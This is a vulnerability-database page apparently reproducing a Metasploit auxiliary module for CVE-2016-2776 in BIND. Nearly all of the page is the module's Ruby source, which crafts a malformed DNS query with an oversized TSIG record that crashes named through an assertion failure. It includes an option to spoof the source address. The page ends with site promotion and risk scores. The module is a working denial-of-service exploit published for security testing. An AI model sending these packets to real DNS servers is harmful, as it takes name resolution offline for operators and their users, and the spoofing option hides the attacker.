Lucene search
+L

BIND TSIG Query Denial of Service

🗓️ 26 Aug 2017 15:41:10Reported by Martin Rocha, Ezequiel Tavella, Alejandro Parodi, Infobyte Research TeamType 
metasploit
 metasploit
🔗 www.rapid7.com👁 128 Views

BIND TSIG Query DoS causing assertion failure in buffer.c while constructing a respons

Related
Code
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Capture
  include Msf::Auxiliary::UDPScanner
  include Msf::Auxiliary::Dos

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'BIND TSIG Query Denial of Service',
      'Description'    => %q{
        A defect in the rendering of messages into packets can cause named to
        exit with an assertion failure in buffer.c while constructing a response
        to a query that meets certain criteria.

        This assertion can be triggered even if the apparent source address
        isn't allowed to make queries.
      },
      # Research and Original PoC - msf module author
      'Author'         => [
        'Martin Rocha',
        'Ezequiel Tavella',
        'Alejandro Parodi',
        'Infobyte Research Team'
      ],
      'References'     => [
        ['CVE', '2016-2776'],
        ['URL', 'http://blog.infobytesec.com/2016/10/a-tale-of-dns-packet-cve-2016-2776.html']
      ],
      'DisclosureDate' => '2016-09-27',
      'License'        => MSF_LICENSE,
      'DefaultOptions' => {'ScannerRecvWindow' => 0}
    ))

    register_options([
      Opt::RPORT(53),
      OptAddress.new('SRC_ADDR', [false, 'Source address to spoof'])
    ])

    deregister_options('PCAPFILE', 'FILTER', 'SNAPLEN', 'TIMEOUT')
  end

  def scan_host(ip)
    if datastore['SRC_ADDR']
      scanner_spoof_send(payload, ip, rport, datastore['SRC_ADDR'])
    else
      print_status("Sending packet to #{ip}")
      scanner_send(payload, ip, rport)
    end
  end

  def payload
    query = Rex::Text.rand_text_alphanumeric(2)  # Transaction ID: 0x8f65
    query << "\x00\x00"  # Flags: 0x0000 Standard query
    query << "\x00\x01"  # Questions: 1
    query << "\x00\x00"  # Answer RRs: 0
    query << "\x00\x00"  # Authority RRs: 0
    query << "\x00\x01"  # Additional RRs: 1

    # Domain Name
    query << get_domain   # Random DNS Name
    query << "\x00"      # [End of name]
    query << "\x00\x01"  # Type: A (Host Address) (1)
    query << "\x00\x01"  # Class: IN (0x0001)

    # Additional records. Name
    query << ("\x3f"+Rex::Text.rand_text_alphanumeric(63))*3 #192 bytes
    query << "\x3d"+Rex::Text.rand_text_alphanumeric(61)
    query << "\x00"

    query << "\x00\xfa" # Type: TSIG (Transaction Signature) (250)
    query << "\x00\xff" # Class: ANY (0x00ff)
    query << "\x00\x00\x00\x00" # Time to live: 0
    query << "\x00\xfc" # Data length: 252

    # Algorithm Name
    query << ("\x3f"+Rex::Text.rand_text_alphanumeric(63))*3 #Random 192 bytes
    query << "\x1A"+Rex::Text.rand_text_alphanumeric(26) #Random 26 bytes
    query << "\x00"

    # Rest of TSIG
    query << "\x00\x00"+Rex::Text.rand_text_alphanumeric(4) # Time Signed: Jan  1, 1970 03:15:07.000000000 ART
    query << "\x01\x2c" # Fudge: 300
    query << "\x00\x10" # MAC Size: 16
    query <<  Rex::Text.rand_text_alphanumeric(16) # MAC
    query << "\x8f\x65" # Original Id: 36709
    query << "\x00\x00" # Error: No error (0)
    query << "\x00\x00" # Other len: 0
  end

  def get_domain
    domain = "\x06"+Rex::Text.rand_text_alphanumeric(6)
    org = "\x03"+Rex::Text.rand_text_alphanumeric(3)
    domain+org
  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

02 Oct 2020 20:00Current
7.7High risk
Vulners AI Score7.7
CVSS 27.8
CVSS 37.5
EPSS0.89482
128